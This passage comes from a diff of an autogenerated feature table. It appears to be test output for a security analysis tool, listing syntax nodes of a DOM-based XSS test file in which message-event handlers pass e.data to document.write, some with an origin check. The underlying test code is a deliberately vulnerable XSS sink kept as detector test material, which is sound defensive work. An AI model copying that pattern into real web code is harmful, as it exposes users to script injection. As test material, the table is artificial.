y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | e => {\\n ... k\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | exceptional return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | exceptional return of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | exceptional return of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | return of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | return of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:18:24:23:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:13 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:13 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:13 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:13 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:13 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:20 | e.origin | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:20 | e.origin | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:20 | e.origin | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:20 | e.origin | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:20 | e.origin | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:45 | e.origi ... ar.com" | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:45 | e.origi ... ar.com" | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:45 | e.origi ... ar.com" | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:45 | e.origi ... ar.com" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:13:19:45 | e.origi ... ar.com" | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:15:19:20 | origin | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:15:19:20 | origin | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:15:19:20 | origin | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:15:19:20 | origin | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:15:19:20 | origin | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:26:19:45 | "https://foobar.com" | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:26:19:45 | "https://foobar.com" | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:26:19:45 | "https://foobar.com" | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:26:19:45 | "https://foobar.com" | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:19:26:19:45 | "https://foobar.com" | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:16 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:16 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:16 | document | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:16 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:16 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:22 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:22 | document.write | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:22 | document.write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:22 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:22 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | documen ... e.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | documen ... e.data) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | documen ... e.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | documen ... e.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | documen ... e.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | exceptional return of documen ... e.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | exceptional return of documen ... e.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | exceptional return of documen ... e.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | exceptional return of documen ... e.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:9:22:30 | exceptional return of documen ... e.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:18:22:22 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:18:22:22 | write | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:18:22:22 | write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:18:22:22 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:18:22:22 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:24 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:24 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:24 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:24 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:24 | e | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11899,6 +90194,92 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:22:24:22:29 | e.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:26:22:29 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:26:22:29 | data | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:26:22:29 | data | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:26:22:29 | data | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:22:26:22:29 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:10 | window | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:10 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:10 | window | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:10 | window | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:10 | window | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:20 | window.onmessage | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:20 | window.onmessage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:20 | window.onmessage | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:20 | window.onmessage | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:25:20 | window.onmessage | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:29:5 | window. ... }\\n } | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:29:5 | window. ... }\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:29:5 | window. ... }\\n } | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:29:5 | window. ... }\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:5:29:5 | window. ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:12:25:20 | onmessage | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:12:25:20 | onmessage | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:12:25:20 | onmessage | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:12:25:20 | onmessage | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:12:25:20 | onmessage | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:25:24 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | 'arguments' object of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | 'arguments' object of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | assignedToPropName | onmessage | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | e => {\\n ... }\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | exceptional return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | exceptional return of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | exceptional return of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | return of anonymous function | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | return of anonymous function | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:25:24:29:5 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:17 | mySet | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:17 | mySet | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:17 | mySet | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:17 | mySet | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:17 | mySet | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:26 | mySet.includes | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:26 | mySet.includes | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:26 | mySet.includes | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:26 | mySet.includes | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:26 | mySet.includes | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | exceptional return of mySet.i ... origin) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | exceptional return of mySet.i ... origin) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | exceptional return of mySet.i ... origin) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | exceptional return of mySet.i ... origin) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | exceptional return of mySet.i ... origin) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | mySet.i ... origin) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | mySet.i ... origin) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | mySet.i ... origin) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | mySet.i ... origin) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:13:26:36 | mySet.i ... origin) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:19:26:26 | includes | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:19:26:26 | includes | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:19:26:26 | includes | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:19:26:26 | includes | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:19:26:26 | includes | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:28 | e | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:28 | e | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:28 | e | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:28 | e | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:28 | e | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | CalleeFlexibleAccessPath | mySet.includes | | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11907,6 +90288,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:26:28:26:35 | e.origin | receiverName | mySet | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:30:26:35 | origin | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:30:26:35 | origin | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:30:26:35 | origin | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:30:26:35 | origin | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:26:30:26:35 | origin | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:20 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:20 | document | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:20 | document | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:20 | document | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:20 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:26 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:26 | document.write | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:26 | document.write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:26 | document.write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:26 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | documen ... e.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | documen ... e.data) | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | documen ... e.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | documen ... e.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | documen ... e.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | exceptional return of documen ... e.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | exceptional return of documen ... e.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | exceptional return of documen ... e.data) | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | exceptional return of documen ... e.data) | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:13:27:34 | exceptional return of documen ... e.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:22:27:26 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:22:27:26 | write | contextSurroundingFunctionParameters | ()\n(e) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:22:27:26 | write | enclosingFunctionBody | foo x event y document write x data document write event data document write y data window addEventListener message foo bind null data items window onmessage e e origin https://foobar.com document write e data window onmessage e mySet includes e origin document write e data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:22:27:26 | write | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:22:27:26 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:27:28:27:28 